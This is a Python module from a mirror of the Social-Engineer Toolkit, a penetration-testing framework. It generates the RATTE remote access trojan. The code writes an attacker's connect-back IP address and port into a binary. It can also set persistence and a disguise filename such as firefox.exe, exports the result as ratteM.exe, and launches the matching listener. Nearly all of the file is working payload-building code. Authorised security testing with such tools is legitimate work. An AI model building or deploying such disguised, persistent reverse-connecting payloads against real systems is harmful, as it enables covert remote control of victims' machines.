mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-24 05:23:03 +00:00
151 lines
6.1 KiB
Python
151 lines
6.1 KiB
Python
|
#!/usr/bin/env python
|
||
|
#
|
||
|
# These are required fields
|
||
|
#
|
||
|
import sys
|
||
|
import subprocess
|
||
|
import os
|
||
|
from src.core.setcore import *
|
||
|
from time import sleep
|
||
|
from src.core.menu import text
|
||
|
|
||
|
# "This is RATTE (Remote Administration Tool Tommy Edition) prepare module.It will prepare a custom ratteM.exe."
|
||
|
MAIN=" RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first"
|
||
|
AUTHOR=" Thomas Werth"
|
||
|
|
||
|
#
|
||
|
# Start ratteserver
|
||
|
#
|
||
|
def ratte_listener_start(port):
|
||
|
|
||
|
subprocess.Popen("src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()
|
||
|
|
||
|
def prepare_ratte(ipaddr,ratteport, persistent,customexe):
|
||
|
|
||
|
print_info("preparing RATTE...")
|
||
|
# replace ipaddress with one that we need for reverse connection back
|
||
|
############
|
||
|
#Load content of RATTE
|
||
|
############
|
||
|
fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
|
||
|
data=fileopen.read()
|
||
|
fileopen.close()
|
||
|
|
||
|
############
|
||
|
#PATCH Server IP into RATTE
|
||
|
############
|
||
|
filewrite=open("src/program_junk/ratteM.exe", "wb")
|
||
|
|
||
|
host=int(len(ipaddr)+1) * "X"
|
||
|
rPort=int(len(str(ratteport))+1) * "Y"
|
||
|
pers=int(len(str(persistent))+1) * "Z"
|
||
|
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
|
||
|
if len(str(customexe)) > 0:
|
||
|
cexe=int(len(str(customexe))+1) * "Q"
|
||
|
else:
|
||
|
cexe=""
|
||
|
|
||
|
filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
|
||
|
|
||
|
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
|
||
|
#filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
|
||
|
filewrite.close()
|
||
|
|
||
|
# def main(): header is required
|
||
|
def main():
|
||
|
valid_site = False
|
||
|
valid_ip = False
|
||
|
valid_response = False
|
||
|
input_counter=0
|
||
|
|
||
|
#################
|
||
|
# get User Input
|
||
|
#################
|
||
|
#ipaddr=raw_input(setprompt(["9", "2"], "IP address to connect back on"))
|
||
|
while valid_ip != True and input_counter < 3:
|
||
|
ipaddr = raw_input(setprompt(["9", "2"], "Enter the IP address to connect back on"))
|
||
|
valid_ip = validate_ip(ipaddr)
|
||
|
if not valid_ip:
|
||
|
if input_counter == 2:
|
||
|
print_error("\nMaybe you have the address written down wrong?")
|
||
|
sleep(4)
|
||
|
return
|
||
|
else:
|
||
|
input_counter += 1
|
||
|
|
||
|
"""try:
|
||
|
ratteport=int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
|
||
|
while ratteport==0 or ratteport > 65535:
|
||
|
print_warning('Port must not be equal to javaport!')
|
||
|
ratteport=int(raw_input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
|
||
|
except ValueError:
|
||
|
ratteport=8080"""
|
||
|
|
||
|
try:
|
||
|
ratteport = int(raw_input(setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
|
||
|
while ratteport == 0 or ratteport > 65535:
|
||
|
if ratteport == 0:
|
||
|
print_warning(text.PORT_NOT_ZERO)
|
||
|
if ratteport > 65535:
|
||
|
print_warning(text.PORT_TOO_HIGH)
|
||
|
ratteport = int(raw_input(setprompt(["9", "2"],"Enter port RATTE Server should listen on [8080]")))
|
||
|
except ValueError:
|
||
|
#core.print_info("Port set to default of 8080")
|
||
|
ratteport = 8080
|
||
|
|
||
|
|
||
|
"""persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
|
||
|
if persistent == 'no' or persistent == '' or persistent == 'n':
|
||
|
persistent='NO'
|
||
|
else:
|
||
|
persistent='YES'"""
|
||
|
|
||
|
while valid_response != True:
|
||
|
persistent=raw_input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
|
||
|
persistent=str.lower(persistent)
|
||
|
if persistent == "no" or persistent == "n":
|
||
|
persistent="NO"
|
||
|
valid_response = True
|
||
|
elif persistent == "yes" or persistent == "y":
|
||
|
persistent="YES"
|
||
|
valid_response = True
|
||
|
else:
|
||
|
print_warning(text.YES_NO_RESPONSES)
|
||
|
|
||
|
valid_response = False
|
||
|
|
||
|
customexe=raw_input(setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
|
||
|
|
||
|
############
|
||
|
# prepare RATTE
|
||
|
############
|
||
|
prepare_ratte(ipaddr,ratteport,persistent,customexe)
|
||
|
|
||
|
print_status("Payload has been exported to src/program_junk/ratteM.exe")
|
||
|
|
||
|
###################
|
||
|
# start ratteserver
|
||
|
###################
|
||
|
"""prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
|
||
|
if prompt == "yes" or prompt == "" or prompt == "y":
|
||
|
print_info("Starting ratteserver...")
|
||
|
ratte_listener_start(ratteport)"""
|
||
|
|
||
|
while valid_response != True:
|
||
|
prompt=raw_input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
|
||
|
prompt=str.lower(prompt)
|
||
|
if prompt == "no" or prompt == "n":
|
||
|
prompt="NO"
|
||
|
print_error("Aborting...")
|
||
|
sleep(2)
|
||
|
valid_response = True
|
||
|
elif prompt == "yes" or prompt == "y":
|
||
|
print_info("Starting ratteserver...")
|
||
|
ratte_listener_start(ratteport)
|
||
|
print_info("Stopping ratteserver...")
|
||
|
sleep(2)
|
||
|
valid_response = True
|
||
|
else:
|
||
|
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
|
||
|
|